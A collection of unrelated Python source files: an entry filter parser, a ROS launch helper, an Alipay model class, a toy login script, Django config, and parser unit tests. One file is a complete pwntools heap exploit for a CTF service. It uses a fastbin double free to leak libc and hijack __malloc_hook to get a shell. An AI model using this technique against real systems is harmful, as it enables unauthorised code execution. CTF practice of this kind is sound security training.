text stringlengths 38 1.54M |
|---|
from nullroute.core import Core
import uuid
from .entry_util import *
from .string import *
class FilterSyntaxError(Exception):
    """Raised when a filter expression cannot be parsed or compiled."""
class Filter():
    """Base class for entry filters.

    Subclasses provide a test(entry) predicate; instances are also directly
    callable.  The class additionally hosts the expression tokenizer
    (parse), the compiler (compile), and CLI convenience wrappers.
    """
    def __call__(self, entry):
        # Calling a filter is the same as running its test() predicate.
        return bool(self.test(entry))
    @staticmethod
    def parse(text):
        """Split a filter expression into top-level tokens.

        Parentheses group a token (nesting allowed inside the group),
        backslash escapes the next character, and unescaped whitespace at
        depth 0 separates tokens.  Raises FilterSyntaxError on unbalanced
        parentheses.
        """
        token = ""
        tokens = []
        depth = 0       # current parenthesis nesting depth
        start = -1      # position where the current token started; -1 = none
        esc = False     # previous character was an escaping backslash
        Core.trace("parse input: %r", text)
        for pos, char in enumerate(text):
            if Core._log_level >= Core.LOG_TRACE:
                Core.trace("  [%s] char=%r, pos=%d, start=%r, token=%r",
                           colour_repr(text, start, pos), char, pos, start, token)
            if char == "(" and not esc:
                if depth == 0:
                    if start >= 0:
                        # don't lose the initial "foo" in "foo(bar"
                        Core.trace("  tokens += prefix-word %r", token)
                        tokens.append(token)
                    start = pos + 1
                    token = ""
                else:
                    # nested parens stay literal inside the grouped token
                    token += char
                Core.trace("  found opening paren; incr depth=%r", depth)
                depth += 1
            elif char == ")" and not esc:
                Core.trace("  found closing paren; decr depth=%r", depth)
                depth -= 1
                if depth == 0 and start >= 0:
                    Core.trace("  tokens += grouped %r", token)
                    tokens.append(token)
                    start = -1
                    token = ""
                else:
                    token += char
            elif char in " \t\r\n" and not esc:
                if depth == 0 and start >= 0:
                    Core.trace("  tokens += word %r", token)
                    tokens.append(token)
                    start = -1
                    token = ""
                    # NOTE(review): this message says "d>0" but the branch
                    # runs at depth == 0 -- trace text looks misplaced.
                    Core.trace("  found whitespace at d>0; unset start")
                else:
                    # whitespace inside a parenthesized group is literal
                    token += char
            elif char == "\\" and not esc:
                esc = True
            else:
                if start < 0:
                    start = pos
                    token = ""
                    Core.trace("  found normal char; set start=%r", pos)
                token += char
                esc = False
        if depth > 0:
            raise FilterSyntaxError("unclosed '(' (depth %d)" % depth)
        elif depth < 0:
            raise FilterSyntaxError("too many ')'s (depth %d)" % depth)
        else:
            # flush the trailing word token, if any (pos is only unbound for
            # empty input, in which case start == -1 short-circuits)
            if start >= 0 and start <= pos:
                Core.trace("  tokens += final %r", token)
                tokens.append(token)
        Core.trace("parse output: %r", tokens)
        return tokens
    @staticmethod
    def quote(token):
        """Quote a token so that parse() reproduces it verbatim."""
        if "(" in token or ")" in token:
            return "(%s)" % token.replace("(", "\\(").replace(")", "\\)")
        elif " " in token:
            return "(%s)" % token
        elif token:
            return token
        else:
            return "()"
    @staticmethod
    def compile(db, pattern):
        """Compile a filter expression string into a Filter object.

        The first token selects an operator and the remaining tokens are
        its arguments (compiled recursively where needed).  A single token
        falls through to a set of prefix-character shortcut syntaxes.
        """
        Core.debug("Filter: compiling %r", pattern)
        tokens = Filter.parse(pattern)
        if not tokens:
            # an empty expression matches nothing
            return ConstantFilter(False)
        op, *args = tokens
        Core.trace("  parsed to op=%r args=%r", op, args)
        if len(args) > 0:
            # boolean operators
            if op in {"AND", "and", "&"}:
                filters = [Filter.compile(db, x) for x in args]
                return ConjunctionFilter(*filters)
            elif op in {"OR", "or", "|"}:
                filters = [Filter.compile(db, x) for x in args]
                return DisjunctionFilter(*filters)
            elif op in {"NOT", "not", "!"}:
                if len(args) > 1:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                filter = Filter.compile(db, args[0])
                return NegationFilter(filter)
            # search filters
            elif op in {"ATTR", "attr"}:
                if len(args) > 3:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                return AttributeFilter(*args)
            elif op in {"ITEM", "item"}:
                if len(args) > 1:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                return ItemNumberFilter(*args)
            elif op in {"ITEMRANGE", "itemrange"}:
                if len(args) > 1:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                return ItemNumberRangeFilter(*args)
            elif op in {"NAME", "name"}:
                if len(args) > 2:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                return ItemNameFilter(*args)
            elif op in {"PATTERN", "pattern"}:
                return PatternFilter(db, " ".join(args))
            elif op in {"TAG", "tag"}:
                if len(args) > 2:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                return TagFilter(*args)
            elif op in {"UUID", "uuid"}:
                if len(args) > 1:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                return ItemUuidFilter(*args)
            # etc.
            elif op in {"ANY", "any"}:
                if len(args) == 1:
                    # single argument: choose glob vs. exact automatically
                    mode = ":glob" if is_glob(args[0]) else ":exact"
                    return AnyFilter(mode, *args)
                elif len(args) == 2:
                    return AnyFilter(*args)
                elif len(args) >= 3:
                    raise FilterSyntaxError("too many arguments for %r" % op)
                else:
                    raise FilterSyntaxError("not enough arguments for %r" % op)
            elif op in {"TRUE", "true", "FALSE", "false"}:
                raise FilterSyntaxError("too many arguments for %r" % op)
            elif op.startswith("="):
                Core.debug("unknown operator %r in (%s), trying name match", op, pattern)
                # NOTE(review): pattern[1:] strips the first character of the
                # whole expression rather than of the op token -- verify this
                # is intended for inputs with leading whitespace/parens.
                return ItemNameFilter(":exact", pattern[1:])
            elif "=" in op or "~" in op:
                Core.debug("unknown operator %r in (%s), trying attribute match", op, pattern)
                return AttributeFilter.compile(db, pattern[1:])
            else:
                Core.debug("unknown operator %r in (%s), assuming AND", op, pattern)
                filters = [Filter.compile(db, x) for x in tokens]
                return ConjunctionFilter(*filters)
        # constant filters
        elif op in {"TRUE", "true", "FALSE", "false"}:
            return ConstantFilter(op[0] in "Tt")
        # shortcut syntaxes
        elif " " in op or "(" in op or ")" in op:
            Core.debug("whitespace in operator %r in (%s), recursing", op, pattern)
            return Filter.compile(db, op)
        elif op.startswith("!"):
            Core.debug("operator with '!' prefix, recursing as (NOT %s)", op[1:])
            return NegationFilter(Filter.compile(db, op[1:]))
        # maybe these *should* be part of PatternFilter
        elif op.startswith("#"):
            return ItemNumberFilter(op[1:])
        elif op.startswith("{"):
            return ItemUuidFilter(op)
        elif op.startswith("="):
            return ItemNameFilter(":exact", op[1:])
        elif op.startswith("^"):
            return ItemNameFilter(":regex", op)
        elif op.startswith("@"):
            return AttributeFilter.compile(db, op[1:])
        elif op.startswith("+"):
            # "+tag"; a bare "+" matches any tagged entry
            return TagFilter(op[1:] or "*")
        elif op.startswith("?"):
            return AnyFilter(":regex", op[1:])
        elif op.isdecimal():
            return ItemNumberFilter(op)
        elif re.match(r"^[0-9,-]+$", op):
            return ItemNumberRangeFilter(op)
        elif "=" in op[1:] or "~" in op[1:]:
            return AttributeFilter.compile(db, op)
        else:
            Core.debug("no known prefix, trying PatternFilter(%r)", op)
            return PatternFilter(db, op)
    @staticmethod
    def cli_search_str(db, text):
        """Search using a single expression string (CLI helper)."""
        return Filter.cli_search_argv(db, [text])
    @staticmethod
    def cli_compile_argv(db, argv):
        """Compile CLI arguments into one filter.

        Multiple arguments are ANDed together; no arguments means
        match-everything.  Syntax errors terminate via Core.die().
        """
        try:
            if len(argv) > 1:
                filters = [Filter.compile(db, x) for x in argv]
                filter = ConjunctionFilter(*filters)
            elif len(argv) > 0:
                filter = Filter.compile(db, argv[0])
            else:
                filter = Filter.compile(db, "*")
        except FilterSyntaxError as e:
            Core.die("syntax error in filter: %s", e.args)
        except re.error as e:
            Core.die("syntax error in regex: %s", e.args)
        return filter
    @staticmethod
    def cli_search_argv(db, argv, fmt=None):
        """Compile argv and return matching db entries.

        If `fmt` is given it must be a %-template that wraps the compiled
        filter's string form into a larger expression (extra constraint).
        """
        filter = Filter.cli_compile_argv(db, argv)
        if fmt:
            Core.debug("applying extra filter: %r", fmt)
            filter = Filter.compile(db, fmt % filter)
        return db.find(filter)
    @staticmethod
    def cli_findfirst_argv(db, argv, fmt=None):
        """Like cli_search_argv() but return only the first match.

        Dies when nothing matches; warns when the match is ambiguous.
        """
        items = list(Filter.cli_search_argv(db, argv, fmt))
        if not items:
            Core.die("no entries found")
        elif len(items) > 1:
            Core.notice("using first result out of %d", len(items))
        return items[0]
def AnyFilter(*args):
    """
    String match that encompasses every visible field (item names, attribute
    names, attribute values, and tags).
    """
    # Factory function rather than a class: returns a disjunction of the four
    # field-specific filters.  AttributeFilter(*args) matches attribute
    # *names*, while AttributeFilter("*", *args) matches values of any
    # attribute (see AttributeFilter's "*" handling).
    return DisjunctionFilter(ItemNameFilter(*args),
                             AttributeFilter(*args),
                             AttributeFilter("*", *args),
                             TagFilter(*args))
class PatternFilter(Filter):
    """
    Collection of various ad-hoc filters, most of which merely expand to other
    filters (and should probably be recognized in the parent Filter.compile
    instead), but a few are specific lambdas that have no other representation
    besides the "(PATTERN :foo)".
    Anything not otherwise recognized is assumed to be a 'PATTERN'.
    """
    def __init__(self, db, pattern):
        self.pattern = pattern
        # compile() may return either a Filter instance or a bare lambda
        self.func = PatternFilter.compile(db, self.pattern)
    def test(self, entry):
        return self.func(entry)
    def __str__(self):
        if isinstance(self.func, Filter):
            return str(self.func)
        else:
            # bare-lambda filters can only be described by their source text
            return "(PATTERN %s)" % Filter.quote(self.pattern)
    @staticmethod
    def compile(db, arg):
        """Translate one shortcut pattern into a concrete filter (or lambda)."""
        Core.debug("PatternFilter: compiling %r", arg)
        if arg == "*":
            return ConstantFilter(True)
        elif arg.startswith("@"):
            return AttributeFilter.compile(db, arg[1:])
        elif arg.startswith("~"):
            try:
                return ItemNameFilter(":regex", arg[1:])
            except re.error as e:
                Core.die("invalid regex %r (%s)", arg[1:], e)
        elif arg.startswith("="):
            return ItemNameFilter(":exact", arg[1:])
        elif arg.startswith(":"):
            # named "smart" filters; most expand to larger expressions
            if arg == ":active":
                return Filter.compile(db, "NOT :inactive")
            elif arg == ":inactive":
                return Filter.compile(db, "OR +cancelled +dead +expired +gone")
            elif arg == ":dead":
                return Filter.compile(db, "AND (NOT +dead) @date.shutdown<now+3")
            elif arg == ":dying":
                return Filter.compile(db, "AND (NOT +dead) @date.shutdown")
            elif arg == ":expired":
                return Filter.compile(db, "OR"
                                          " (AND (NOT +expired) @date.expiry<now+30)"
                                          " (AND (NOT +dead) @date.shutdown<now+3)")
            elif arg == ":expiring":
                return Filter.compile(db, "AND (NOT +expired) @date.expiry<now+30")
            elif arg == ":untagged":
                return Filter.compile(db, "NOT (TAG *)")
            elif arg == ":weak":
                return Filter.compile(db, "AND :active !+smartcard !+default !+other"
                                          " @!pass~^.{,9}$")
            elif arg == ":badref":
                # no filter-language equivalent; must remain a lambda
                return lambda entry: entry.has_bad_references()
            else:
                Core.die("unrecognized pattern %r", arg)
        elif arg.startswith("{"):
            return ItemUuidFilter(arg)
        else:
            return ItemNameFilter(":glob", arg)
class ItemNameFilter(Filter):
    """Matches an entry by name with :exact, :glob or :regex semantics.

    Accepts either (value) -- defaulting to :glob -- or (mode, value).
    All comparisons are case-insensitive; an entry matches when any of
    its names matches.
    """
    def __init__(self, *args):
        if len(args) == 1:
            mode = ":glob"
            value, = args
        elif len(args) == 2:
            mode, value = args
        elif len(args) >= 3:
            raise FilterSyntaxError("too many arguments for %r" % "NAME")
        else:
            raise FilterSyntaxError("not enough arguments for %r" % "NAME")
        self.mode = mode
        self.value = value
        # each branch installs a per-instance test() lambda
        if mode in {":exact", "="}:
            self.mode = ":exact"
            value = value.casefold()
            self.test = lambda entry: any(v.casefold() == value for v in entry.names)
            Core.trace("compiled to [name = %r]", value)
        elif mode in {":glob", "?"}:
            self.mode = ":glob"
            regex = re_compile_glob(value)
            self.test = lambda entry: any(regex.fullmatch(str(v)) for v in entry.names)
            Core.trace("compiled to [name ~ %r]", regex)
        elif mode in {":regex", "~"}:
            self.mode = ":regex"
            regex = re.compile(value, re.I)
            self.test = lambda entry: any(regex.search(str(v)) for v in entry.names)
            Core.trace("compiled to [name ~ %r]", regex)
        else:
            raise FilterSyntaxError("unknown mode %r for %r" % (mode, "NAME"))
    def __str__(self):
        return "(NAME %s %s)" % (self.mode, Filter.quote(self.value))
class AttributeFilter(Filter):
    """Matches an entry by attribute presence or attribute value.

    Argument arities (note the differing orders):
      (attr)              -- attribute present (exact name)
      (mode, attr)        -- attribute name matched by mode
      (attr, mode, value) -- attribute value matched by mode;
                             attr "*" means "value of any attribute"
    Modes are :exact/:glob/:regex, plus :lt/:gt for "date.*" attributes.
    """
    def __init__(self, *args):
        if len(args) == 1:
            mode = ":exact"
            attr, = args
            value = None
        elif len(args) == 2:
            mode, attr = args
            value = None
        elif len(args) == 3:
            attr, mode, value = args
        elif len(args) >= 4:
            raise FilterSyntaxError("too many arguments for %r" % "ATTR")
        else:
            raise FilterSyntaxError("not enough arguments for %r" % "ATTR")
        self.attr = attr
        self.mode = mode
        self.value = value
        # each branch installs a per-instance test() lambda
        if value is None:
            # presence tests -- match on attribute *names*
            if mode in {":exact", "="}:
                self.mode = ":exact"
                self.test = lambda entry: attr in entry.attributes
                Core.trace("compiled to [key %r present]", attr)
            elif mode in {":glob", "?"}:
                self.mode = ":glob"
                regex = re_compile_glob(attr)
                self.test = lambda entry: any(regex.fullmatch(k) for k in entry.attributes)
                Core.trace("compiled to [keys ~ %r]", regex)
            elif mode in {":regex", "~"}:
                self.mode = ":regex"
                regex = re.compile(attr, re.I)
                self.test = lambda entry: any(regex.search(k) for k in entry.attributes)
                Core.trace("compiled to [keys ~ %r]", regex)
            else:
                raise FilterSyntaxError("unknown attr-mode %r for %r" % (mode, "ATTR"))
        elif value == "":
            raise FilterSyntaxError("empty match value after %r" % attr)
        elif attr == "*":
            # value tests across *all* attributes
            if mode in {":exact", "="}:
                self.mode = ":exact"
                self.test = lambda entry: any(value in vs
                                              for vs in entry.attributes.values())
                Core.trace("compiled to [values = %r]", value)
            elif mode in {":glob", "?"}:
                self.mode = ":glob"
                regex = re_compile_glob(value)
                self.test = lambda entry: any(any(regex.fullmatch(str(v)) for v in vs)
                                              for vs in entry.attributes.values())
                Core.trace("compiled to [values ~ %r]", regex)
            elif mode in {":regex", "~"}:
                self.mode = ":regex"
                regex = re.compile(value, re.I)
                self.test = lambda entry: any(any(regex.search(str(v)) for v in vs)
                                              for vs in entry.attributes.values())
                Core.trace("compiled to [values ~ %r]", regex)
            else:
                raise FilterSyntaxError("unknown value-mode %r for %r" % (mode, "ATTR"))
        else:
            # value tests on one named attribute (may hold multiple values)
            if mode in {":exact", "="}:
                self.mode = ":exact"
                self.test = lambda entry: value in entry.attributes.get(attr, [])
                Core.trace("compiled to [%r = %r]", attr, value)
            elif mode in {":glob", "?"}:
                self.mode = ":glob"
                regex = re_compile_glob(value)
                self.test = lambda entry: any(regex.fullmatch(str(v))
                                              for v in entry.attributes.get(attr, []))
                Core.trace("compiled to [%r ~ %r]", attr, regex)
            elif mode in {":regex", "~"}:
                self.mode = ":regex"
                regex = re.compile(value, re.I)
                self.test = lambda entry: any(regex.search(str(v))
                                              for v in entry.attributes.get(attr, []))
                Core.trace("compiled to [%r ~ %r]", attr, regex)
            elif mode in {":lt", "<"}:
                self.mode = "<"
                # ordering comparisons only make sense for date attributes
                if attr.startswith("date."):
                    self.test = lambda entry: any(date_cmp(v, value) < 0
                                                  for v in entry.attributes.get(attr, []))
                    Core.trace("compiled to [%r < %r]", attr, value)
                else:
                    raise FilterSyntaxError("unsupported op %r %r " % (attr, mode))
            elif mode in {":gt", ">"}:
                self.mode = ">"
                if attr.startswith("date."):
                    self.test = lambda entry: any(date_cmp(v, value) > 0
                                                  for v in entry.attributes.get(attr, []))
                    Core.trace("compiled to [%r > %r]", attr, value)
                else:
                    raise FilterSyntaxError("unsupported op %r %r " % (attr, mode))
            else:
                raise FilterSyntaxError("unknown value-mode %r for %r" % (mode, "ATTR"))
    def __str__(self):
        if self.value is None:
            return "(ATTR %s %s)" % (self.mode, Filter.quote(self.attr))
        else:
            return "(ATTR %s %s %s)" % (Filter.quote(self.attr), self.mode,
                                        Filter.quote(self.value))
    @staticmethod
    def compile(db, arg):
        """Compile "attr=value" / "attr~regex" / "attr<v" / "attr>v" shorthand.

        Reflink attributes with a "#n" value are expanded via the database
        (so "#3" can refer to a search result); a failed expansion compiles
        to a match-nothing filter rather than an error.
        """
        Core.debug("AttributeFilter: compiling %r", arg)
        if "=" in arg:
            attr, glob = arg.split("=", 1)
            attr = translate_attr(attr)
            if attr_is_reflink(attr) and glob.startswith("#"):
                try:
                    value = db.expand_attr_cb(attr, glob)
                    Core.trace("-- expanded match value %r to %r", glob, value)
                    return AttributeFilter(attr, ":exact", value)
                except IndexError:
                    Core.trace("-- failed to expand match value %r", glob)
                    return ConstantFilter(False)
            elif is_glob(glob):
                return AttributeFilter(attr, ":glob", glob)
            else:
                return AttributeFilter(attr, ":exact", glob)
        elif "~" in arg:
            attr, regex = arg.split("~", 1)
            attr = translate_attr(attr)
            try:
                return AttributeFilter(attr, ":regex", regex)
            except re.error as e:
                Core.die("invalid regex %r (%s)", regex, e)
        elif "<" in arg:
            # NOTE(review): unlike the branches above, </> do not run the
            # attribute name through translate_attr() -- verify intentional.
            attr, match = arg.split("<", 1)
            return AttributeFilter(attr, "<", match)
        elif ">" in arg:
            attr, match = arg.split(">", 1)
            return AttributeFilter(attr, ">", match)
        elif "*" in arg:
            # bare glob: match on attribute names
            return AttributeFilter(":glob", arg)
        else:
            # bare name: attribute-presence test
            attr = translate_attr(arg)
            return AttributeFilter(":exact", attr)
class TagFilter(Filter):
    """Matches an entry by its tags.

    Accepts (value) with mode inferred -- "" means "untagged", "*" means
    "has any tag", a glob pattern means :glob, anything else :exact --
    or an explicit (mode, value) pair.
    """
    def __init__(self, *args):
        if len(args) == 1:
            mode = None
            value, = args
        elif len(args) == 2:
            mode, value = args
        elif len(args) >= 3:
            raise FilterSyntaxError("too many arguments for %r" % "TAG")
        else:
            raise FilterSyntaxError("not enough arguments for %r" % "TAG")
        self.mode = mode
        self.value = value
        if mode is None:
            # infer the mode from the value's shape
            if value == "":
                self.mode = ":exact"
                self.test = lambda entry: len(entry.tags) == 0
            elif value == "*":
                self.mode = ":glob"
                self.test = lambda entry: len(entry.tags) > 0
            elif is_glob(value):
                self.mode = ":glob"
                regex = re_compile_glob(self.value)
                self.test = lambda entry: any(regex.fullmatch(t) for t in entry.tags)
            else:
                self.mode = ":exact"
                self.test = lambda entry: value in entry.tags
        else:
            if mode in {":exact", "="}:
                self.mode = ":exact"
                self.test = lambda entry: value in entry.tags
            elif mode in {":glob", "?"}:
                self.mode = ":glob"
                regex = re_compile_glob(value)
                self.test = lambda entry: any(regex.fullmatch(t) for t in entry.tags)
            elif mode in {":regex", "~"}:
                self.mode = ":regex"
                regex = re.compile(value, re.I)
                self.test = lambda entry: any(regex.search(str(t)) for t in entry.tags)
            else:
                raise FilterSyntaxError("unknown mode %r for %r" % (mode, "TAG"))
    def __str__(self):
        # :exact is the default, so it is omitted from the round-trip form
        if self.mode == ":exact":
            return "(TAG %s)" % Filter.quote(self.value)
        else:
            return "(TAG %s %s)" % (self.mode, Filter.quote(self.value))
class ItemNumberFilter(Filter):
    """Matches an entry by its exact item number.

    The number is given as a string (or anything int() accepts) and is
    compared against ``entry.itemno``.
    """
    def __init__(self, pattern):
        try:
            self.value = int(pattern)
        except ValueError:
            # suppress the chained ValueError traceback; the syntax error
            # is the only useful information for the caller
            raise FilterSyntaxError("integer value expected for 'ITEM'") from None
    def test(self, entry):
        return entry.itemno == self.value
    def __str__(self):
        return "(ITEM %d)" % self.value
class ItemNumberRangeFilter(Filter):
    """Matches entries whose item number falls in a range expression.

    The expression (e.g. "1,3-5") is expanded once by expand_range() into
    a set of item numbers -- exact syntax is defined by that helper.
    """
    def __init__(self, pattern):
        self.pattern = pattern
        # pre-expand into a set for O(1) membership tests
        self.items = set(expand_range(pattern))
    def test(self, entry):
        return entry.itemno in self.items
    def __str__(self):
        return "(ITEMRANGE %s)" % self.pattern
class ItemUuidFilter(Filter):
    """Matches an entry by its UUID.

    The pattern is parsed by uuid.UUID(), which accepts hyphenated,
    brace-wrapped and URN forms.
    """
    def __init__(self, pattern):
        try:
            self.value = uuid.UUID(pattern)
        except ValueError:
            # suppress the chained ValueError traceback; the syntax error
            # is the only useful information for the caller
            raise FilterSyntaxError("malformed value for %r" % "UUID") from None
    def test(self, entry):
        return entry.uuid == self.value
    def __str__(self):
        return "(UUID %s)" % self.value
class ConjunctionFilter(Filter):
    """Matches entries accepted by every sub-filter (logical AND)."""
    def __init__(self, *filters):
        self.filters = [*filters]
    def test(self, entry):
        for subfilter in self.filters:
            if not subfilter.test(entry):
                return False
        return True
    def __str__(self):
        inner = " ".join(map(str, self.filters))
        return "(AND %s)" % inner
class DisjunctionFilter(Filter):
    """Matches entries accepted by at least one sub-filter (logical OR)."""
    def __init__(self, *filters):
        self.filters = [*filters]
    def test(self, entry):
        for subfilter in self.filters:
            if subfilter.test(entry):
                return True
        return False
    def __str__(self):
        inner = " ".join(map(str, self.filters))
        return "(OR %s)" % inner
class NegationFilter(Filter):
    """Inverts the result of a wrapped filter (logical NOT)."""
    def __init__(self, filter):
        self.filter = filter
    def test(self, entry):
        result = self.filter.test(entry)
        return not result
    def __str__(self):
        return "(NOT %s)" % (self.filter,)
class ConstantFilter(Filter):
    """Accepts or rejects every entry unconditionally."""
    def __init__(self, result):
        self.result = bool(result)
    def test(self, entry):
        return self.result
    def __str__(self):
        if self.result:
            return "(TRUE)"
        return "(FALSE)"
|
from typing import Optional, Dict
import xml.etree.ElementTree as ET
class EphemeralLaunchFile(object):
    """
    Provides temporary launch files that can be used to pass launch-time
    parameters to ROS. Specifically, ephemeral launch files are used to provide
    launch-time parameters to ROSLaunchParent since there is no means to supply
    parameters via the ROSLaunchParent API.
    """
    def __init__(self,
                 base_file: str,
                 parameters: Optional[Dict[str, str]] = None
                 ) -> None:
        """
        Copies `base_file` into a new launch file, overriding (or adding)
        one top-level <arg> tag per entry in `parameters`.
        """
        if parameters is None:
            parameters = {}
        tree = ET.ElementTree()
        tree.parse(base_file)
        root = tree.getroot()
        # override the corresponding <arg> tag for each parameter
        for (param, value) in parameters.items():
            found = False
            # doesn't look at child arguments --- considered unnecessary.
            # findall() (not find()) is required here: find() returns the
            # first matching *element*, and iterating it would walk its
            # children (or raise TypeError when there is no match at all).
            for arg in root.findall("arg[@name='{}']".format(param)):
                # a launch-time value overrides any declared default;
                # the tag may legitimately have no 'default' attribute
                arg.attrib.pop('default', None)
                arg.set('value', value)
                found = True
            # if we didn't find the tag for this argument, add a new one
            if not found:
                arg = ET.SubElement(root, 'arg')
                arg.set('name', param)
                arg.set('value', value)
        # n.b. Python will take care of destroying the temporary file during
        # garbage collection
        self.__handle = open('temp.launch', 'w')  # FIXME: this is here for debugging
        # self.handle = NamedTemporaryFile(suffix='.launch')
        tree.write(self.path)
    @property
    def path(self):
        """
        The location of this launch file on disk.
        """
        return self.__handle.name
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayCommerceEducateFacepayApplyModel(object):
    """Request model for the commerce.educate.facepay.apply API call."""

    def __init__(self):
        # every field starts unset; values are assigned via the properties
        self._ext_info = None
        self._face_open_id = None
        self._face_uid = None
        self._scene = None
        self._school_stdcode = None

    @property
    def ext_info(self):
        return self._ext_info

    @ext_info.setter
    def ext_info(self, value):
        self._ext_info = value

    @property
    def face_open_id(self):
        return self._face_open_id

    @face_open_id.setter
    def face_open_id(self, value):
        self._face_open_id = value

    @property
    def face_uid(self):
        return self._face_uid

    @face_uid.setter
    def face_uid(self, value):
        self._face_uid = value

    @property
    def scene(self):
        return self._scene

    @scene.setter
    def scene(self, value):
        self._scene = value

    @property
    def school_stdcode(self):
        return self._school_stdcode

    @school_stdcode.setter
    def school_stdcode(self, value):
        self._school_stdcode = value

    def to_alipay_dict(self):
        """Serialize all truthy fields into a plain dict for the API call."""
        params = dict()
        for field in ('ext_info', 'face_open_id', 'face_uid',
                      'scene', 'school_stdcode'):
            value = getattr(self, field)
            if not value:
                continue
            # nested models know how to serialize themselves
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a response dict; returns None for falsy input."""
        if not d:
            return None
        o = AlipayCommerceEducateFacepayApplyModel()
        for field in ('ext_info', 'face_open_id', 'face_uid',
                      'scene', 'school_stdcode'):
            if field in d:
                setattr(o, field, d[field])
        return o
|
from pwn import *
# target is 64-bit: p64()/flat() pack little-endian 8-byte words
context.arch = 'amd64'
###Utils
def new(sz,data):
    # Menu option 1: allocate a chunk of `sz` bytes and write `data` into it.
    # Uses the global connection `r` established below.
    r.sendlineafter('> ','1')
    r.sendlineafter('size: ',str(sz))
    r.sendafter('content: ',data)
def prnt(idx):
    # Menu option 2: print the chunk at `idx`; returns the output line
    # with the trailing newline stripped.
    r.sendlineafter('> ','2')
    r.sendlineafter('index: ',str(idx))
    return r.recvline()[:-1]
def rmv(idx):
    # Menu option 3: free the chunk at `idx` (index is not cleared by the
    # target, which enables the double frees below).
    r.sendlineafter('> ','3')
    r.sendlineafter('index: ',str(idx))
r = remote('csie.ctf.tw',10133)
###Useful Address
stdout_offset = 0x3c4620 #strange, why this one?
one_gadget = 0xef6c4 #rsp+0x50 will always be 0 in doublefree handler :)
leak_stdout = 0x601ff5
malloc_hook_block_offset = 0x3c3b10-0x28+0x5
###Leak libc_base
# NOTE(review): the rmv(0);rmv(1);rmv(0) sequence looks like a classic
# fastbin double-free (0x68 requests land in the 0x70 fastbin); the next
# allocation's content overwrites the freed chunk's fd pointer so a later
# allocation returns a chunk near `leak_stdout` -- verify against binary.
new(0x68,'a')
new(0x68,'b')
rmv(0)
rmv(1)
rmv(0)
new(0x68,p64(leak_stdout))
new(0x68,'d')
new(0x68,'e')
# padding chunk; the stdout pointer is read back after the 27 filler bytes
new(0x68,'f'*27)
stdout_addr = u64(prnt(5)[27:].ljust(8,b'\x00'))
libc_base = stdout_addr-stdout_offset
###Hijack malloc_hook
# same double-free trick, this time pointing the fake chunk near
# __malloc_hook so the final write installs the one_gadget address
rmv(0)
rmv(1)
rmv(0)
new(0x68,flat(malloc_hook_block_offset+libc_base))
new(0x68,'d')
new(0x68,'e')
new(0x68,b'f'*3+p64(0)*2+p64(one_gadget+libc_base))
###Double free #double free mallocs a block to write error message
rmv(0)
rmv(0)
r.interactive()
|
# Minimal demo login prompt: fixed username + numeric PIN check.
print('HELLO\nWELCOME TO OUR SOFTWARE')
username = input('ENTER YOUR USERNAME: ')
access = 'DIVINE'
try:
    if username == access:
        # only ask for the password once the username matched;
        # int() raises ValueError for non-numeric input (caught below)
        password = int(input('ENTER YOUR PASSWORD: '))
        if password == 1234:
            print('YOU ARE WELCOME', username)
        else:
            # the username already matched here, so the failure is the
            # password (the original message blamed the username)
            print('INVALID PASSWORD')
    else:
        # previously a wrong username produced no output at all
        print('invalid Username')
except Exception as e:
    # best-effort: report the error (e.g. non-numeric password) and exit
    print(e)
|
from __future__ import unicode_literals
from django.apps import AppConfig
class AnappConfig(AppConfig):
    """Django application configuration for the 'anapp' app."""
    # dotted module path Django uses to locate the application
    name = 'anapp'
|
import unittest
from bs4 import BeautifulSoup
from nanorcc.parse import parse_tag, parse_rcc_file, get_rcc_data
from collections import OrderedDict
import pandas as pd
class TestParseTag(unittest.TestCase):
    """test the parse_tag function using example.RCC"""
    def setUp(self):
        # parse the fixture once per test; the RCC format is XML-like, so
        # html.parser is lenient enough to split it into tags.
        # NOTE(review): even indices of soup.contents are the tags -- the
        # odd ones are presumably whitespace text nodes; verify fixture.
        with open('test/example.RCC','r') as f:
            soup = BeautifulSoup(f.read(),'html.parser')
        self.header_tag = soup.contents[0]
        self.sample_attributes_tag = soup.contents[2]
        self.lane_attributes_tag = soup.contents[4]
        self.code_summary_tag = soup.contents[6]
        self.messages_tag = soup.contents[8]
    def test_header(self):
        # parse_tag returns (casefolded tag name, parsed payload)
        name,result = parse_tag(self.header_tag)
        self.assertDictEqual(
            result,
            {'FileVersion':'1.6','SoftwareVersion':'2.1.1.0005'}
        )
        self.assertEqual(name,'Header'.casefold())
    def test_sample_attributes(self):
        name,result = parse_tag(self.sample_attributes_tag)
        self.assertDictEqual(
            result,
            {
                'SampleID':'01',
                'Owner':'mk',
                'Comments':'50ng',
                'Date':'20100714',
                'GeneRLF':'NS_H_miR',
                'SystemAPF':'n6_vDV1',
            }
        )
        self.assertEqual(name,'Sample_Attributes'.casefold())
    def test_lane_attributes(self):
        name,result = parse_tag(self.lane_attributes_tag)
        self.assertDictEqual(
            result,
            {
                'LaneID':'1',
                'FovCount':'600',
                'FovCounted':'600',
                'ScannerID':'DA01',
                'StagePosition':'1',
                'BindingDensity':'0.22',
                'CartridgeID':'miRNAlinearity',
            }
        )
        self.assertEqual(name,'Lane_Attributes'.casefold())
    def test_code_summary(self):
        # the code summary parses to a list of per-gene dicts; order is
        # not significant, hence assertCountEqual
        name,result = parse_tag(self.code_summary_tag)
        self.assertCountEqual(
            result,
            [
                {
                    'CodeClass':'Positive',
                    'Name':'POS_A(128)',
                    'Accession':'nmiR00813.1',
                    'Count':'8667',
                },
                {
                    'CodeClass':'Negative',
                    'Name':'NEG_C(0)',
                    'Accession':'nmiR00828.1',
                    'Count':'11',
                },
                {
                    'CodeClass':'Housekeeping',
                    'Name':'RPLP0|0',
                    'Accession':'NM_001002.3',
                    'Count':'137',
                },
                {
                    'CodeClass':'Endogenous1',
                    'Name':'hsa-miR-758|0',
                    'Accession':'nmiR00633.1',
                    'Count':'12',
                },
            ]
        )
